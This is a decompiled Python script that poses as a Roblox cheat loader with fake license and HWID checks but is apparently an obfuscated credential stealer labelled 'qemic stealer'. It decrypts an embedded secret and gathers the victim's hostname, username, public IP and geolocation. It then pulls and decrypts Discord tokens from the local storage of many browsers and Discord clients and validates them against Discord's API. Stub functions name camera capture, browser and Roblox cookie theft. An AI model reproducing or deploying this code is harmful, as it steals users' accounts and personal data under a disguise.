# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: mona(code).py
# Bytecode version: 3.10.0rc2 (3439)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)

import os
import time
import fade
import psutil
import sys
from colorama import init, Fore, Style
init(autoreset=True)
yellow = '[93m'
softer_pink = '[38;5;213m'
reset = '[0m'

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

def On1y_W1nd0w5():
    if sys.platform.startswith('win'):
        return False
    return True
time.sleep(0.3)
print(f'{Fore.YELLOW}[loader] Version checking...{Style.RESET_ALL}')
time.sleep(1.1)
print('[Loader] Mona.cc is up to date.')
time.sleep(1.1)
clear_screen()
time.sleep(0.2)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} Checking HWID')
time.sleep(2.1)
print(f'{softer_pink}[{reset}-{softer_pink}]{reset} HWID not found.')
time.sleep(0.8)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} license key required!')
time.sleep(0.8)
clear_screen
time.sleep(0.4)
print(' ')
print(' ')
print(' ')
input(f'                                    input {softer_pink}license key{reset}:')
clear_screen
time.sleep(0.4)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} Looking for Roblox...')
time.sleep(1.7)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} Roblox Found!')
time.sleep(0.4)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} Trying to attach to Roblox')
time.sleep(0.2)
print(f'{softer_pink}[{reset}+{softer_pink}]{reset} This might take some time, please dont exit!')

def background_task():
    for i in range(3):
        time.sleep(1)
try:
    QDISMZBNYIOBBASBZAXEYUENTCMQZRGIFFOKJHTAOVUPANZISCOPVRGVWLTVEZXRGLBVOOYNMFUECHSJEV = On1y_W1nd0w5()
except:
    QDISMZBNYIOBBASBZAXEYUENTCMQZRGIFFOKJHTAOVUPANZISCOPVRGVWLTVEZXRGLBVOOYNMFUECHSJEV = False
if QDISMZBNYIOBBASBZAXEYUENTCMQZRGIFFOKJHTAOVUPANZISCOPVRGVWLTVEZXRGLBVOOYNMFUECHSJEV == True:
    sys.exit()
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y():
    return

def Unb10ck_K3y():
    return

def B10ck_T45k_M4n4g3r():
    return

def B10ck_M0u53():
    return

def B10ck_W3b5it3():
    return

def St4rtup():
    return

def Sy5t3m_Inf0():
    return

def Op3n_U53r_Pr0fi13_53tting5():
    return

def Scr33n5h0t():
    return

def C4m3r4_C4ptur3():
    return

def Di5c0rd_T0k3n():
    return

def Di5c0rd_inj3c710n():
    return

def Br0w53r_5t341():
    return

def R0b10x_C00ki3():
    return

def F4k3_3rr0r():
    return

def Sp4m_0p3n_Pr0gr4m():
    return

def Sp4m_Cr34t_Fil3():
    return

def Shutd0wn():
    return

def Sp4m_Opti0ns():
    return

def R3st4rt():
    return

def Clear():
    try:
        if sys.platform.startswith('win'):
            os.system('cls')
        else:  # inserted
            if sys.platform.startswith('linux'):
                os.system('clear')
    except:
        return None

def Decrypt(KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):
            v4r_password = v4r_password.encode()
        return v4r_kdf.derive(v4r_password)
    KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data = base64.b64decode(KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO)
    v4r_salt = KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data[:16]
    v4r_iv = KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data[16:32]
    KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data = KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()
GYVWVGOQEBTIYUPVLWCUCPWDBWLPGRDXXXNOXSIJAWUHAKMFGEYKOQMKTIVONLYGZN = '\nYEHKbWrUV8R14dMGTaCEsBP8MUYEws/EBaVcKBRX+sIgKIopmmzzI1eNL2PTj+sjXPgDvcsBUnjCG11ZIwC3LoEv6cwOk5BbP/u90H/IuUQHE/FjX9EgvkWaNZrYpaApREOKZmGasVFq9q4XZLM4DeHT5jpkWGS6rC994A8EjUWbZfuOkg2y+x1fC7ZeTkoGN8Fe9m75irEI6uEy/jzd1A==\n'
SVJLGTFYQODZUYVFHEYTAWNSQIHNHIYPCOGTZQGNCVTJSMIYAL = 'OfSlDzisZCWXHXjolAKCTnQiFOUdtaQaFQCZxBIsaEORtLJEshMzQzTGOzldxHVvEiAFCBSkreWZgMlgSvhmgAKUBCFXqfhvMHsTkUCyOggEnTcWcsEXUPwOcVjTBCQHVKnzPjwXqgQBvgNDuVHeiFuTPyMOKSeGYgbdnknGYAWMLVkavNpeFzHnpHPjyl'
XAMVFMMWCTWLYDWTKKMZDTSOMGRBKCYGERBHBOANKCDHXPIZUEEFZCMNWACWDZNXOHKVYXXKEX = 'redtiger.shop'
OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE = 11011333
NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP = 'qemic stealer'
WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM = 'https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&'
UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ = 'qemic stealer'
ZCVYORYUYRVANEXVPHHAUVJPSHZHALPQCFGTZVHTUACKLJUHGFKKMZNRNFUXKUCCQUHMZQXHCMPGYQRKBPJBQWW = {'text': UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, 'icon_url': WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM}
YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK = Decrypt(GYVWVGOQEBTIYUPVLWCUCPWDBWLPGRDXXXNOXSIJAWUHAKMFGEYKOQMKTIVONLYGZN, SVJLGTFYQODZUYVFHEYTAWNSQIHNHIYPCOGTZQGNCVTJSMIYAL)
try:
    FYASRJPYUHNGEPDVZMYQKFUTAWKQMFNGWXHLMODESRCPYMNWMGEMDXRWMQZZDMXDMCGWZGKGNIAOUPHWU = socket.gethostname()
except:
    FYASRJPYUHNGEPDVZMYQKFUTAWKQMFNGWXHLMODESRCPYMNWMGEMDXRWMQZZDMXDMCGWZGKGNIAOUPHWU = 'None'
try:
    POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR = os.getlogin()
except:
    POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR = 'None'
try:
    GLSASXWDWBMOHDPFWKYDQZDNEABHZCRDZEPBHZVALQABLYBVAOJWTNXSYCIBLMY = win32api.GetUserNameEx(win32api.NameDisplay)
except:
    GLSASXWDWBMOHDPFWKYDQZDNEABHZCRDZEPBHZVALQABLYBVAOJWTNXSYCIBLMY = 'None'
try:
    WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP = requests.get('https://api.ipify.org?format=json').json().get('ip', 'None')
except:
    WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP = 'None'
try:
    GJNYHMKEISUQBMWJYNUEVXOKTVQWFOBLEKZPIEYHZJCKLRSDMFAHNGSB = socket.gethostbyname(socket.gethostname())
except:
    GJNYHMKEISUQBMWJYNUEVXOKTVQWFOBLEKZPIEYHZJCKLRSDMFAHNGSB = 'None'
try:
    ZOQHBDAFDAYPQZNLKAOISBGECLALZFUKJTJLIIKDVXSYTFACUVJGVLCUYLYSDFUCKASGSPLEK = requests.get(f'https://{XAMVFMMWCTWLYDWTKKMZDTSOMGRBKCYGERBHBOANKCDHXPIZUEEFZCMNWACWDZNXOHKVYXXKEX}/api/ip/ip={WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}')
    KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU = ZOQHBDAFDAYPQZNLKAOISBGECLALZFUKJTJLIIKDVXSYTFACUVJGVLCUYLYSDFUCKASGSPLEK.json()
    JNWWBVHWOCUTZDRFCJWDAVSMURTCWFGNBGSYRETBNRVBCUJUGOWLJGSVKVRKYKXXEDJVBJ = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('country', 'None')
    JNWWBVHWOCUTZDRFCJWDAVSMURTCWFGNBGSYRETBNRVBCUJUGOWLJGSVKVRKYKXXEDJVBJ_code = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('country_code', 'None')
    ILMVQULRVWFQBWWYYKKUZAYBCFDASTGRXVQBAWCVENLHRQDBFUBFORHIVRURYRTJGMBKNFXISBBWCBSXCVQYNVP = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('region', 'None')
    ILMVQULRVWFQBWWYYKKUZAYBCFDASTGRXVQBAWCVENLHRQDBFUBFORHIVRURYRTJGMBKNFXISBBWCBSXCVQYNVP_code = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('region_code', 'None')
    LYOLYNTQXCXSFPCMYQFUYLTTJPYZDQWNGGBPKABBPGCJMSJMSJLRCKBPXPXTMGVRRIDVCJFR = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('zip', 'None')
    LNOOGXNTYKHWWRBBWRCTSLRCMRNSOVWYQCXMOQBCYRNORECZYFFSZTQHYTLROOPGQBZICMBEUQXXBKHDOQXOCBMSONMGMVL = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('city', 'None')
    KRAATUASLHNTJRDWWBDHLJCWEZBCHBTATRIQXIOXMKDVGWKKYFYDRTPIPQTDKTKPAPHRAMESMUFU = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('latitude', 'None')
    RVYQGETGYAYXDVLCWGYETQIWXHJVEYRDKJTCFNKQCBZRGBSTOSPPOVIHPKTOYGUAGGEUPFVIGBQOQJCIOLIVVA = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('longitude', 'None')
    CWCTIPVITCSTEWJWGXXWHLPWCGYYXWNNZBKUHFYQOPCOYNTBEGSF = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('timezone', 'None')
    KBYADLHSHCBXLIBYGNXWAAIAZAZTPDZXDPGZADSPPWMLJVYKCHAVXDIQOXUHUFQWNAYNGIATFPGRHDBSRYBVWPOHRMVABBMWWH = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('isp', 'None')
    RAUGKVQMAHIGTHOPNMPKJGGFJABDKBCLTWHIZUPAMMBKBLPYLUPXELYPTXGBSIRJOTIQWYCJBKLBYOHNEQYWS = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('org', 'None')
    GMKFTPUWKIGSVWZQMDVQIPJPCBQERDWVKMALRSTADTMVXOBLYDGKYNYHMO = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('as', 'None')
except:
    ZOQHBDAFDAYPQZNLKAOISBGECLALZFUKJTJLIIKDVXSYTFACUVJGVLCUYLYSDFUCKASGSPLEK = requests.get(f'http://ip-api.com/json/{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}')
    KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU = ZOQHBDAFDAYPQZNLKAOISBGECLALZFUKJTJLIIKDVXSYTFACUVJGVLCUYLYSDFUCKASGSPLEK.json()
    JNWWBVHWOCUTZDRFCJWDAVSMURTCWFGNBGSYRETBNRVBCUJUGOWLJGSVKVRKYKXXEDJVBJ = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('country', 'None')
    JNWWBVHWOCUTZDRFCJWDAVSMURTCWFGNBGSYRETBNRVBCUJUGOWLJGSVKVRKYKXXEDJVBJ_code = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('countryCode', 'None')
    ILMVQULRVWFQBWWYYKKUZAYBCFDASTGRXVQBAWCVENLHRQDBFUBFORHIVRURYRTJGMBKNFXISBBWCBSXCVQYNVP = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('regionName', 'None')
    ILMVQULRVWFQBWWYYKKUZAYBCFDASTGRXVQBAWCVENLHRQDBFUBFORHIVRURYRTJGMBKNFXISBBWCBSXCVQYNVP_code = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('region', 'None')
    LYOLYNTQXCXSFPCMYQFUYLTTJPYZDQWNGGBPKABBPGCJMSJMSJLRCKBPXPXTMGVRRIDVCJFR = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('zip', 'None')
    LNOOGXNTYKHWWRBBWRCTSLRCMRNSOVWYQCXMOQBCYRNORECZYFFSZTQHYTLROOPGQBZICMBEUQXXBKHDOQXOCBMSONMGMVL = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('city', 'None')
    KRAATUASLHNTJRDWWBDHLJCWEZBCHBTATRIQXIOXMKDVGWKKYFYDRTPIPQTDKTKPAPHRAMESMUFU = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('lat', 'None')
    RVYQGETGYAYXDVLCWGYETQIWXHJVEYRDKJTCFNKQCBZRGBSTOSPPOVIHPKTOYGUAGGEUPFVIGBQOQJCIOLIVVA = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('lon', 'None')
    CWCTIPVITCSTEWJWGXXWHLPWCGYYXWNNZBKUHFYQOPCOYNTBEGSF = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('timezone', 'None')
    KBYADLHSHCBXLIBYGNXWAAIAZAZTPDZXDPGZADSPPWMLJVYKCHAVXDIQOXUHUFQWNAYNGIATFPGRHDBSRYBVWPOHRMVABBMWWH = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('isp', 'None')
    RAUGKVQMAHIGTHOPNMPKJGGFJABDKBCLTWHIZUPAMMBKBLPYLUPXELYPTXGBSIRJOTIQWYCJBKLBYOHNEQYWS = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('org', 'None')
    GMKFTPUWKIGSVWZQMDVQIPJPCBQERDWVKMALRSTADTMVXOBLYDGKYNYHMO = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('as', 'None')

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO = 'https://discord.com/api/v9/users/@me'
        FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT = os.getenv('localappdata')
        BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB = os.getenv('appdata')
        JSDJMPCOMYMLNLMAMJIWBMSSIGJKZNPHWGFWNOVQYLJCYXGASCHMNHVSHAAQITTDDQAWTMQUKFWGAWEVLSEOQYP = '[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}'
        JSDJMPCOMYMLNLMAMJIWBMSSIGJKZNPHWGFWNOVQYLJCYXGASCHMNHVSHAAQITTDDQAWTMQUKFWGAWEVLSEOQYP_enc = 'dQw4w9WgXcQ:[^\\\"]*'
        NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI = []
        QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK = []
        VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD = {}
        EGCBCDNWZNRBVQIWPATMTCDGBFGSXKOAQFWKAOFYIGVWAFJNZHO = {'Discord': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\discord\\Local Storage\\leveldb\\', 'Discord Canary': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\discordcanary\\Local Storage\\leveldb\\', 'Lightcord': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\Lightcord\\Local Storage\\leveldb\\', 'Discord PTB': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\discordptb\\Local Storage\\leveldb\\', 'Opera': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\', 'Opera GX': BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\', 'Amigo': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Amigo\\User Data\\Local Storage\\leveldb\\', 'Torch': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Torch\\User Data\\Local Storage\\leveldb\\', 'Kometa': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Kometa\\User Data\\Local Storage\\leveldb\\', 'Orbitum': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Orbitum\\User Data\\Local Storage\\leveldb\\', 'CentBrowser': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\', '7Star': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\', 'Sputnik': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\', 'Vivaldi': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + 'Vivaldi', 'Google Chrome4': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\', 'Google Chrome5': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\', 'Epic Privacy Browser': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\', 'Microsoft Edge': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\', 'Uran': FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT + '
        for PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN in EGCBCDNWZNRBVQIWPATMTCDGBFGSXKOAQFWKAOFYIGVWAFJNZHO.items():
            if not os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
                continue
            TYTDZYIEHWZEMSBANNKAGUMHXRYBAKDOSOPEVMHXISJSKOJFTCOUKPQAVTEGLOHJGURCMBPTSWROENPNIEHMPZGZBTMYCBKBG = PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS.replace(' ', '').lower()
            if 'cord' in XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN:
                if not os.path.exists(BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + f'\\{TYTDZYIEHWZEMSBANNKAGUMHXRYBAKDOSOPEVMHXISJSKOJFTCOUKPQAVTEGLOHJGURCMBPTSWROENPNIEHMPZGZBTMYCBKBG}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
                    if v4r_file_name[(-3):] not in ['log', 'ldb']:
                        continue
                    with open(f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(JSDJMPCOMYMLNLMAMJIWBMSSIGJKZNPHWGFWNOVQYLJCYXGASCHMNHVSHAAQITTDDQAWTMQUKFWGAWEVLSEOQYP_enc, v4r_line.strip()):
                                NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + f'\\{TYTDZYIEHWZEMSBANNKAGUMHXRYBAKDOSOPEVMHXISJSKOJFTCOUKPQAVTEGLOHJGURCMBPTSWROENPNIEHMPZGZBTMYCBKBG}\\Local State'))
                                if validate_t0k3n(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW, RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO):
                                    VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF = requests.get(RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO, headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW}).json()['id']
                                    if VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF not in QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK:
                                        NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI.append(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW)
